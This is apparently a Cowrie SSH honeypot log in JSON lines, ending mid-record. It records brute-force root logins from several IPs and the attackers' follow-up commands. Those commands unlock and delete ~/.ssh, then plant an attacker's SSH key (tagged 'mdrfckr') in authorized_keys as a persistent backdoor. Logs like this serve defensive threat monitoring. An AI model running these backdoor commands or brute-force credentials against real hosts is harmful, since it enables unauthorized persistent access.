{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:48:28.551121Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:48:28.552184Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
{"eventid":"cowrie.session.connect","src_ip":"101.44.186.66","src_port":42926,"dst_ip":"1.2.3.4","dst_port":22,"session":"c24f32f6249d","protocol":"ssh","message":"New connection: 101.44.186.66:42926 (1.2.3.4:22) [session: c24f32f6249d]","sensor":"my-vps","timestamp":"2025-08-28T07:48:28.711272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:48:28.712177Z","src_ip":"101.44.186.66","session":"c24f32f6249d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:48:28.876013Z","src_ip":"101.44.186.66","session":"c24f32f6249d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:48:29.572413Z","src_ip":"101.44.186.66","session":"c24f32f6249d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:48:30.739019Z","src_ip":"101.44.186.66","session":"c24f32f6249d"}
{"eventid":"cowrie.session.connect","src_ip":"101.44.186.66","src_port":43392,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c408b3ef51b","protocol":"ssh","message":"New connection: 101.44.186.66:43392 (1.2.3.4:22) [session: 5c408b3ef51b]","sensor":"my-vps","timestamp":"2025-08-28T07:48:30.901910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:48:30.903287Z","src_ip":"101.44.186.66","session":"5c408b3ef51b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:48:31.067755Z","src_ip":"101.44.186.66","session":"5c408b3ef51b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:48:31.768118Z","src_ip":"101.44.186.66","session":"5c408b3ef51b"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:48:31.933819Z","src_ip":"101.44.186.66","session":"5c408b3ef51b"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:48:31.936486Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
{"eventid":"cowrie.session.connect","src_ip":"37.221.66.41","src_port":43646,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bbe249c89d3","protocol":"ssh","message":"New connection: 37.221.66.41:43646 (1.2.3.4:22) [session: 5bbe249c89d3]","sensor":"my-vps","timestamp":"2025-08-28T07:49:13.692204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:49:13.699370Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:49:13.736606Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Pass123!@#","message":"login attempt [root/Pass123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:49:13.995836Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:49:14.161912Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:49:14.162760Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:49:14.163728Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:49:14.242033Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:49:14.418175Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:49:14.418916Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:49:14.491642Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:49:14.492503Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.session.connect","src_ip":"37.221.66.41","src_port":43660,"dst_ip":"1.2.3.4","dst_port":22,"session":"283502959a5f","protocol":"ssh","message":"New connection: 37.221.66.41:43660 (1.2.3.4:22) [session: 283502959a5f]","sensor":"my-vps","timestamp":"2025-08-28T07:49:14.528882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:49:14.529650Z","src_ip":"37.221.66.41","session":"283502959a5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:49:14.594738Z","src_ip":"37.221.66.41","session":"283502959a5f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:49:14.839098Z","src_ip":"37.221.66.41","session":"283502959a5f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:49:15.893610Z","src_ip":"37.221.66.41","session":"283502959a5f"}
{"eventid":"cowrie.session.connect","src_ip":"37.221.66.41","src_port":43674,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0e87a33ccf2","protocol":"ssh","message":"New connection: 37.221.66.41:43674 (1.2.3.4:22) [session: d0e87a33ccf2]","sensor":"my-vps","timestamp":"2025-08-28T07:49:15.931039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:49:15.932166Z","src_ip":"37.221.66.41","session":"d0e87a33ccf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:49:16.001834Z","src_ip":"37.221.66.41","session":"d0e87a33ccf2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:49:16.229870Z","src_ip":"37.221.66.41","session":"d0e87a33ccf2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:49:16.324051Z","src_ip":"37.221.66.41","session":"5bbe249c89d3"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:49:16.324910Z","src_ip":"37.221.66.41","session":"d0e87a33ccf2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64248,"dst_ip":"1.2.3.4","dst_port":22,"session":"88f19e3e67f7","protocol":"ssh","message":"New connection: 217.72.205.35:64248 (1.2.3.4:22) [session: 88f19e3e67f7]","sensor":"my-vps","timestamp":"2025-08-28T07:49:45.659694Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:49:45.660965Z","src_ip":"217.72.205.35","session":"88f19e3e67f7"}
{"eventid":"cowrie.session.connect","src_ip":"51.15.166.60","src_port":45182,"dst_ip":"1.2.3.4","dst_port":22,"session":"0055e2eefaa4","protocol":"ssh","message":"New connection: 51.15.166.60:45182 (1.2.3.4:22) [session: 0055e2eefaa4]","sensor":"my-vps","timestamp":"2025-08-28T07:50:25.650900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:50:25.651985Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:50:25.676785Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.login.success","username":"root","password":"aaa123321","message":"login attempt [root/aaa123321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:50:25.821446Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:50:25.887108Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:50:25.887985Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:50:25.888921Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:50:25.915057Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:50:26.025639Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:50:26.026331Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:50:26.053398Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:50:26.054237Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.session.connect","src_ip":"51.15.166.60","src_port":45196,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3294c4e589d","protocol":"ssh","message":"New connection: 51.15.166.60:45196 (1.2.3.4:22) [session: a3294c4e589d]","sensor":"my-vps","timestamp":"2025-08-28T07:50:26.077849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:50:26.078613Z","src_ip":"51.15.166.60","session":"a3294c4e589d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh